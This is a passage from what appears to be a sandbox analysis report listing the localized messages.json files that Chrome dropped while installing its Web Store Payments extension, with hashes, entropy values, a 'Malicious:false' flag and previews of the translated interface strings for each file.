                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):647
                                                                                                                                                                                                                        Entropy (8bit):4.595421267152647
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12:1HEJRuzGGRuz+WYpU34ujSBu+dgYO8ZpU34J+Bu03OyZnLAOfTY5HN:1HEFcWYpPNa8ZpD+FOGAOfEHN
                                                                                                                                                                                                                        MD5:3A01FEE829445C482D1721FF63153D16
                                                                                                                                                                                                                        SHA1:F3EAAADDC03F943FC88B30B67F534AA13E3336DD
                                                                                                                                                                                                                        SHA-256:0BDE54B20845124113383B6EB81E43A0F05E4EB0C44BEE3C1DFAC4CC5FEC2836
                                                                                                                                                                                                                        SHA-512:3B92B6C86D30FD36AA3CEFF8773BA60C3FC5CC19C693540137044C5838A5503895C770C0336A4D0A3DB5E42F3FB36274D8D3F85B9DCA2F3EC0E974FDDB0BEAD8
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "app_description": {.. "message": "Chrome Web Storen maksut".. },.. "app_name": {.. "message": "Chrome Web Storen maksut".. },.. "craw_app_unavailable": {.. "message": "Sovellus ei ole t.ll. hetkell. k.ytett.viss..".. },.. "craw_connect_to_network": {.. "message": "Muodosta verkkoyhteys.".. },.. "iap_unavailable": {.. "message": "Sovelluksen sis.iset maksut eiv.t ole t.ll. hetkell. k.ytett.viss..".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Kirjaudu sis..n Chromeen.".. }..}..
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\fil\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):658
                                                                                                                                                                                                                        Entropy (8bit):4.5231229502550745
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12:1HEJADlbGGADlb+WYpU34hTUT+dgHfZAFFZO8ZpU34hTjzeT03OyZnLAOfTYHfvF:1HEYah6WYp7TUSoxOS8Zp7TOsOGAOfqV
                                                                                                                                                                                                                        MD5:57AF5B654270A945BDA8053A83353A06
                                                                                                                                                                                                                        SHA1:EEEF7A4F869F97CF471A05D345E74F982D15E167
                                                                                                                                                                                                                        SHA-256:EC002ED92359F67818B49455DFC579E140368E6A004080AF022FD4F57F6B03F2
                                                                                                                                                                                                                        SHA-512:5F0AE839FCF3F4EA48FF41A76655AE0F3821564AFD5D42FBB9FBB9A38E8D8F7BB5E9B6F71064588CD441261F644095A44A755C134CE546D506D9A21E488BAF52
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "app_description": {.. "message": "Mga Pagbabayad sa Chrome Web Store".. },.. "app_name": {.. "message": "Mga Pagbabayad sa Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Kasalukuyang hindi available ang app.".. },.. "craw_connect_to_network": {.. "message": "Mangyaring kumonekta sa isang network.".. },.. "iap_unavailable": {.. "message": "Kasalukuyang hindi available ang Mga Pagbabayad na In-App.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Mangyaring mag-sign in sa Chrome.".. }..}..
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\fr\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):677
                                                                                                                                                                                                                        Entropy (8bit):4.552569602149629
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12:1HEJALf/nbGGALf/nb+WYpU34Owdgbyb+dgdQjO8ZpU34ITQpGnbyb03OyZnLAO8:1HE4Hna1Hn6WYpNdgpY8ZpSTQwnBOGAh
                                                                                                                                                                                                                        MD5:8D11C90F44A6585B57B933AB38D1FFF8
                                                                                                                                                                                                                        SHA1:3F9D44EA8807069A32AACA2AAAD02FD892E6CC90
                                                                                                                                                                                                                        SHA-256:599491F8C52B945C16C441ADF45BFD45AFAE046DA07757D97C56AF4DE75ED3B5
                                                                                                                                                                                                                        SHA-512:D7EF7F5AD7EF1A1595825D79B69E2B1E988AD3CF1F3881496FCCD30F241E4E9C6E457F9F5D0F855DE3536DB7A40C3E1C55946B50D3F556F4A35285066A0CD6F7
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "app_description": {.. "message": "Paiements via le Chrome.Web.Store".. },.. "app_name": {.. "message": "Paiements via le Chrome.Web.Store".. },.. "craw_app_unavailable": {.. "message": "Application indisponible pour le moment.".. },.. "craw_connect_to_network": {.. "message": "Veuillez vous connecter . un r.seau.".. },.. "iap_unavailable": {.. "message": "Les paiements via l'application ne sont pas disponibles pour le moment.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Veuillez vous connecter . Chrome.".. }..}..
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\hi\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):835
                                                                                                                                                                                                                        Entropy (8bit):4.791154467711985
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24:1HEs07J0JWYp9vnCSVLP8Zp6CsOGAOf8SLm:Wh7qgYp1CMLUph1GiSLm
                                                                                                                                                                                                                        MD5:E376D757C8FD66AC70A7D2D49760B94E
                                                                                                                                                                                                                        SHA1:1525C5B1312D409604F097768503298EC440CC4D
                                                                                                                                                                                                                        SHA-256:8106D98C4F8DA16DB698444409558E29CC96735E188BFA303C333A5D99231C1D
                                                                                                                                                                                                                        SHA-512:673F3F259AF2946E4F49BBED14A2A70D44BF9FDA9D7A71DC9172BA9B7B3C7F7062B16D29682B638D485B0520ED6F99E7A735F28C7C719B539559005B69FA7555
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "app_description": {.. "message": "Chrome ... ..... ......".. },.. "app_name": {.. "message": "Chrome ... ..... ......".. },.. "craw_app_unavailable": {.. "message": "......... .. ... ...... .... ...".. },.. "craw_connect_to_network": {.. "message": "..... ....... .. ...... .....".. },.. "iap_unavailable": {.. "message": "..-.. ...... ... ...... .... ...".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "..... Chrome ... .... .. .....".. }..}..
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\hr\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):618
                                                                                                                                                                                                                        Entropy (8bit):4.56999230891419
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12:1HEJGiimxmbZGGGiimxmbZ+WYpU34OBOEuhopIO+dgcapZO8ZpU34GiiZrMrQphK:1HE4H4TH8WYpNjTta28ZpQVLP0SOGAOK
                                                                                                                                                                                                                        MD5:8185D0490C86363602A137F9A261CC50
                                                                                                                                                                                                                        SHA1:5BD933B874441CEACB9201CCC941FF67BAED6DC0
                                                                                                                                                                                                                        SHA-256:A2B2EC359A9DD9DCCCE02859CE1E738BD30FAA4A05F1DC522893FFDF722BBC15
                                                                                                                                                                                                                        SHA-512:D7629978FC031EA5F716F9C1065FB2FEAB48C15F10CD68830DC966FA1002C03DDC7ACDE314C7D075F9F3A0A68552A6ACBCCDEE24CF20B6C3DD1BCE6562D0396E
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "app_description": {.. "message": "Pla.anja u web-trgovini Chrome".. },.. "app_name": {.. "message": "Pla.anja u web-trgovini Chrome".. },.. "craw_app_unavailable": {.. "message": "Aplikacija trenuta.no nije dostupna.".. },.. "craw_connect_to_network": {.. "message": "Pove.ite se s mre.om.".. },.. "iap_unavailable": {.. "message": "Pla.anje u aplikaciji trenuta.no nije dostupno.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Prijavite se na Chrome.".. }..}..
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\hu\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):683
                                                                                                                                                                                                                        Entropy (8bit):4.675370843321512
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12:1HEJVJiGGVJi+WYpU34Hpo9O+dgMmfgijO8ZpU34Huo9O03OyZnLAOfTYBIAYm:1HEVrk5WYpQzTUg/8ZpwoXOGAOfYIAd
                                                                                                                                                                                                                        MD5:85609CF8623582A8376C206556ED2131
                                                                                                                                                                                                                        SHA1:1E16EB70DB5E59BB684866FF3E3925C2DEF25A12
                                                                                                                                                                                                                        SHA-256:32A249749F12ADB6A220BF9ADC272C7E5D9AD5497A38B0086D961E3ABA17FBC6
                                                                                                                                                                                                                        SHA-512:27883430865D3CFA6EDFE8C6CE1442BD96150B5CE520CCF7D556A330CAA6392C712B47BD86F7350E174876BC681F6DEC94D1312402655B0AF90883A2899EC78B
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "app_description": {.. "message": "Chrome Internetes .ruh.z Fizet.si rendszere".. },.. "app_name": {.. "message": "Chrome Internetes .ruh.z Fizet.si rendszere".. },.. "craw_app_unavailable": {.. "message": "Az alkalmaz.s jelenleg nem .rhet. el.".. },.. "craw_connect_to_network": {.. "message": "K.rj.k, csatlakozzon egy h.l.zathoz.".. },.. "iap_unavailable": {.. "message": "Az alkalmaz.son bel.li fizet.s jelenleg nem .rhet. el.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Jelentkezzen be a Chrome-ba.".. }..}..
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\id\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):604
                                                                                                                                                                                                                        Entropy (8bit):4.465685261172395
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12:1HEJs25bGGs25b+WYpU34ORBHAeSJ+dgkmO8ZpU34s22C/SzFAs03OyZnLAOfTYR:1HEBaA6WYpaHFH8ZptOYOGAOf2D
                                                                                                                                                                                                                        MD5:EAB2B946D1232AB98137E760954003AA
                                                                                                                                                                                                                        SHA1:60BDC2937905B311D2C9844DF2D639D7AC9F7F67
                                                                                                                                                                                                                        SHA-256:C6E8800450602DE0F39FE9F6854472383813FB454B08ABAE7E25A9167CE004C3
                                                                                                                                                                                                                        SHA-512:970FEC9A9EF0BAF7F693C4C5977F3B47914579C5B5414FCE9DBB5E4574659A5BB9AD2DE0CC886B368F49C019785AF7D2D7FE82F71341F039EADC399ED776CA12
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "app_description": {.. "message": "Pembayaran Chrome Webstore".. },.. "app_name": {.. "message": "Pembayaran Chrome Webstore".. },.. "craw_app_unavailable": {.. "message": "Aplikasi tidak tersedia saat ini.".. },.. "craw_connect_to_network": {.. "message": "Sambungkan ke jaringan.".. },.. "iap_unavailable": {.. "message": "Pembayaran Dalam Aplikasi saat ini tidak tersedia.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Harap masuk ke Chrome.".. }..}..
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\it\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):603
                                                                                                                                                                                                                        Entropy (8bit):4.479418964635223
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12:1HEJsqd/bGGsqd/b+WYpU34OcX4+dgUvIO8ZpU34vq703OyZnLAOfTYsD:1HEXd/aKd/6WYpZrv58ZpskOGAOfzD
                                                                                                                                                                                                                        MD5:A328EEF5E841E0C72D3CD7366899C5C8
                                                                                                                                                                                                                        SHA1:2851ED658385804E87911643F5A4200B1FB26E13
                                                                                                                                                                                                                        SHA-256:CD891C45F7586FB4A2514205A11F260E4A6D4482FA03D901909DD9F57BE0536D
                                                                                                                                                                                                                        SHA-512:E47297896E981774EC3B59D41B89D6BA9333F6B4435EB9727D8645A46B10C7D408ADE06844871FA757382FBE7E645276449DB7B1B23BC59C9A71A5CB5A5ECC57
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "app_description": {.. "message": "Pagamenti Chrome Web Store".. },.. "app_name": {.. "message": "Pagamenti Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "App al momento non disponibile.".. },.. "craw_connect_to_network": {.. "message": "Collegati a una rete.".. },.. "iap_unavailable": {.. "message": "La funzione Pagamenti In-App non . al momento disponibile.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Accedi a Chrome.".. }..}..
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\ja\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):697
                                                                                                                                                                                                                        Entropy (8bit):5.20469020877498
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12:1HEJ07uGG07u+WYpU34DB+dgnsVztO8ZpU34MwiB03OyZnLAOfTYmSH:1HEcnDNWYp1kxU8Zp2wiqOGAOfpSH
                                                                                                                                                                                                                        MD5:9B3A5D473C3F2BBFAEECE94A07A940B8
                                                                                                                                                                                                                        SHA1:61BACA342CF766BBA15C7B4D892A0E7DAC9405AA
                                                                                                                                                                                                                        SHA-256:706312A4A2AEF3317223F141EB2B82685345B7EED444F16BB4DF3A272716DA1F
                                                                                                                                                                                                                        SHA-512:94F6FEE9A11BD890AB8211C98D1CC142348961EBCF756F66477A3E3A76519804B70BE0AE4E551739F8AFE32D7ADE6EDE04EF6B9B9EED03E3A857E6058EEDD4C6
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "app_description": {.. "message": "Chrome ........".. },.. "app_name": {.. "message": "Chrome ........".. },.. "craw_app_unavailable": {.. "message": ".................".. },.. "craw_connect_to_network": {.. "message": "................".. },.. "iap_unavailable": {.. "message": ".......................".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Chrome ............".. }..}..
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\ko\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):631
                                                                                                                                                                                                                        Entropy (8bit):5.160315577642469
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12:1HEJ1GG1+WYpU34K3aT+dgh8d0HTO8ZpU34KaNkaT03OyZnLAOfTY/YeHx:1HEajWYpc3aSl0Hq8Zpc6kasOGAOfyYA
                                                                                                                                                                                                                        MD5:9F6B4D82A70C74CA751E2EAE70FAB5CF
                                                                                                                                                                                                                        SHA1:0534F125FFCE8222277CF2BE3401C59DAF9217F8
                                                                                                                                                                                                                        SHA-256:D1467B8D037114403E8F4EFC52E88C4A7FEB96126BE4CFF883FEFF1084EF7E68
                                                                                                                                                                                                                        SHA-512:ED9319830314385D09C06F62EE34186E8CA576C857981205E4468A28B3ACD2AB03384E77B866032C324ABDD97A56EFD08E2D6E0C79D563578B3EC52517819BD8
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "app_description": {.. "message": "Chrome . ... ..".. },.. "app_name": {.. "message": "Chrome . ... ..".. },.. "craw_app_unavailable": {.. "message": ".. .. ... . .....".. },.. "craw_connect_to_network": {.. "message": "..... ......".. },.. "iap_unavailable": {.. "message": ".. .. ... ... . .....".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Chrome. .......".. }..}..
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\lt\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):665
                                                                                                                                                                                                                        Entropy (8bit):4.66839186029557
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12:1HEJpqHnkGGpqHnk+WYpU346M+dgV6O8ZpU34WzSWz03OyZnLAOfTYx:1HELqHtKqHPWYpM3A8ZpwGzOGAOfg
                                                                                                                                                                                                                        MD5:4CA644F875606986A9898D04BDAE3EA5
                                                                                                                                                                                                                        SHA1:722A10569E93975129D67FBDB75B537D9D622AD1
                                                                                                                                                                                                                        SHA-256:7C311AB751D840D750C11553C083785813E079C1D464FE568A98C9E3EF3DB96C
                                                                                                                                                                                                                        SHA-512:E575E3D0622F5BD4B6C0EE79128A1B1F1882195670139D1983F4377D847141B8FB8EBB8BCED82AF3A220ED07D3577AFBE085BADC0E9C7678292B80E3EC5D3444
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "app_description": {.. "message": ".Chrome. internetin.s parduotuv.s mok.jimo sistema".. },.. "app_name": {.. "message": ".Chrome. internetin.s parduotuv.s mok.jimo sistema".. },.. "craw_app_unavailable": {.. "message": "Programa .iuo metu negalima.".. },.. "craw_connect_to_network": {.. "message": "Prisijunkite prie tinklo.".. },.. "iap_unavailable": {.. "message": "Mok.jimai programoje .iuo metu negalimi.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Prisijunkite prie .Chrome..".. }..}..
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\lv\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):671
                                                                                                                                                                                                                        Entropy (8bit):4.631774066483956
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12:1HEJFhVbGGFhVb+WYpU34wDoz+dgGedBO8ZpU34wF03OyZnLAOfTYGYID:1HENQKkWYp2Doy/em8Zp2WOGAOfRYID
                                                                                                                                                                                                                        MD5:C5CE2C51391EAFD3DA9E4C71549A3C28
                                                                                                                                                                                                                        SHA1:1F67FF6EF6E90C0CE3AAF56ED543A3EFD381574D
                                                                                                                                                                                                                        SHA-256:1FA1DF2CA8516DEF490FB8484E9AA498ACFF80EEF5C9258FFE42D3678E6C7DED
                                                                                                                                                                                                                        SHA-512:C85F6281E682F52BC2147DEA7E2F3BB4DC48D98BADA8687B05C6C7271C78EA7F5431CD51671A4184C9AE004FC53C016E3C594697F483195CCBA08A93821EEF70
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "app_description": {.. "message": "Chrome interneta veikala maks.jumu sist.ma".. },.. "app_name": {.. "message": "Chrome interneta veikala maks.jumu sist.ma".. },.. "craw_app_unavailable": {.. "message": "Lietotne pagaid.m nav pieejama.".. },.. "craw_connect_to_network": {.. "message": "L.dzu, izveidojiet savienojumu ar t.klu.".. },.. "iap_unavailable": {.. "message": "Maks.jumi lietotn.s pa.laik nav pieejami.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "L.dzu, pierakstieties p.rl.k. Chrome.".. }..}..
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\nb\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):624
                                                                                                                                                                                                                        Entropy (8bit):4.555032032637389
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12:1HEJhiOGGhiO+WYpU34OHSN+dgFjdGFZO8ZpU34JgdN03OyZnLAOfTYiD:1HEDiHIitWYpCYJ8ZpD1OGAOfRD
                                                                                                                                                                                                                        MD5:93C459A23BC6953FF744C35920CD2AF9
                                                                                                                                                                                                                        SHA1:162F884972103A08ADB616A7EB3598431A2924C5
                                                                                                                                                                                                                        SHA-256:2CD700AEB57D89C2E73333D0702556EE3FF3863516170F85669BC680FCBDC4E0
                                                                                                                                                                                                                        SHA-512:F76E6E8D8499306883C3EC1E774F7E8BB6B601096DA5A14D17D3E7D5732829542041E42B7350466589291ADCC83FB065FD591B4E20CFCF8EDC586E128ECBFCB5
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "app_description": {.. "message": "Chrome Nettmarked-betalinger".. },.. "app_name": {.. "message": "Chrome Nettmarked-betalinger".. },.. "craw_app_unavailable": {.. "message": "Appen er utilgjengelig for .yeblikket.".. },.. "craw_connect_to_network": {.. "message": "Du m. koble til et nettverk.".. },.. "iap_unavailable": {.. "message": "Betaling i app er ikke tilgjengelig for .yeblikket.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Du m. logge p. Chrome.".. }..}..
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\nl\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):615
                                                                                                                                                                                                                        Entropy (8bit):4.4715318546237315
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12:1HEJJQGkbGGJQGkb+WYpU34OQKJT+dgiXUmvFZO8ZpU34g7JT03OyZnLAOfTYMD:1HErxkaqxk6WYptndXI8ZpTOGAOfbD
                                                                                                                                                                                                                        MD5:7A8F9D0249C680F64DEC7650A432BD57
                                                                                                                                                                                                                        SHA1:53477198AEE389F6580921B4876719B400A23CA1
                                                                                                                                                                                                                        SHA-256:92BE7C2DC9CFBE5A65E9CE6488D364C8D7EC19E7B67A31E4D43C1CB2B169671C
                                                                                                                                                                                                                        SHA-512:969AB979546A741C0F3EDBEEB21BABA375FA8870D4FB9248CDD4C305736E332E10CAB7B64C5C078E60EC0CD73848101B390BE8F44B89C310058AF4C1CA3C8AA7
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "app_description": {.. "message": "Betalingen via Chrome Web Store".. },.. "app_name": {.. "message": "Betalingen via Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "App momenteel niet beschikbaar.".. },.. "craw_connect_to_network": {.. "message": "Maak verbinding met een netwerk.".. },.. "iap_unavailable": {.. "message": "In-app-betalingen is momenteel niet beschikbaar.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Log in bij Chrome.".. }..}..
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\pl\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):636
                                                                                                                                                                                                                        Entropy (8bit):4.646901997539488
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12:1HEJbiVbGGbiVb+WYpU34OBHlBi9+dgQUg6O8ZpU34bdbfiIu03OyZnLAOfTYR5k:1HE5iVauiV6WYpIAYr8ZpxFiaOGAOfIC
                                                                                                                                                                                                                        MD5:0E6194126AFCCD1E3098D276A7400175
                                                                                                                                                                                                                        SHA1:E8127B905A640B1C46362FA6E1127BE172F4A40F
                                                                                                                                                                                                                        SHA-256:E2699F98C511B18A2AFB82EAE9A4804B646C4FF1077D80E77C17A3943A6373C2
                                                                                                                                                                                                                        SHA-512:A71F7C7BFBBF1E37E699601AF2E095C56CBA91F90CB7556477DF31D01B83ADFB1271E1775C9BA299FF6875BBFC2B6AB47488CC88E33DEF2F6F2E0E5AC687B777
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "app_description": {.. "message": "P.atno.ci w sklepie Chrome Web Store".. },.. "app_name": {.. "message": "P.atno.ci w sklepie Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Aplikacja jest obecnie niedost.pna.".. },.. "craw_connect_to_network": {.. "message": "Po..cz si. z sieci..".. },.. "iap_unavailable": {.. "message": "P.atno.ci w ramach aplikacji s. teraz niedost.pne.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Zaloguj si. w Chrome.".. }..}..
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\pt_BR\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):636
                                                                                                                                                                                                                        Entropy (8bit):4.515158874306633
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12:1HEJsc/bGGsc/b+WYpU34OLw+dgn/KzO8ZpU34FjIBMwGRO03OyZnLAOfTYN+KcY:1HEb/a8/6WYp4mZ8Zp7cKlOGAOf2tD
                                                                                                                                                                                                                        MD5:86A2B91FA18B867209024C522ED665D5
                                                                                                                                                                                                                        SHA1:63DEC245637818C76655E01FCB6D59784BC7184E
                                                                                                                                                                                                                        SHA-256:6374880FDD1F8AF1EE8AEA6A06B73BE0AB265AFCEB4FE6F08BDE3B3989264B21
                                                                                                                                                                                                                        SHA-512:DA6DBDE5028756421C2904F605632EE98831A25A1247E6238A931629B94CE8A00FD76F4235F118D2167304BD60F2C06B2AD78E54FF6CE53F8C38DF8C7B5AFCE4
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "app_description": {.. "message": "Pagamentos da Chrome Web Store".. },.. "app_name": {.. "message": "Pagamentos da Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Aplicativo indispon.vel no momento.".. },.. "craw_connect_to_network": {.. "message": "Conecte-se a uma rede.".. },.. "iap_unavailable": {.. "message": "No momento, os Pagamentos no aplicativo n.o est.o dispon.veis.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Fa.a login no Google Chrome.".. }..}..
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\pt_PT\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):622
                                                                                                                                                                                                                        Entropy (8bit):4.526171498622949
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12:1HEJsZUkbGGsZUkb+WYpU34OAE+dgqxKzO8ZpU34rEpBfvPO03OyZnLAOfTYLD:1HEmUka5Uk6WYpFvdxZ8ZpSTnPlOGAOS
                                                                                                                                                                                                                        MD5:750A4800EDB93FBE56495963F9FB3B94
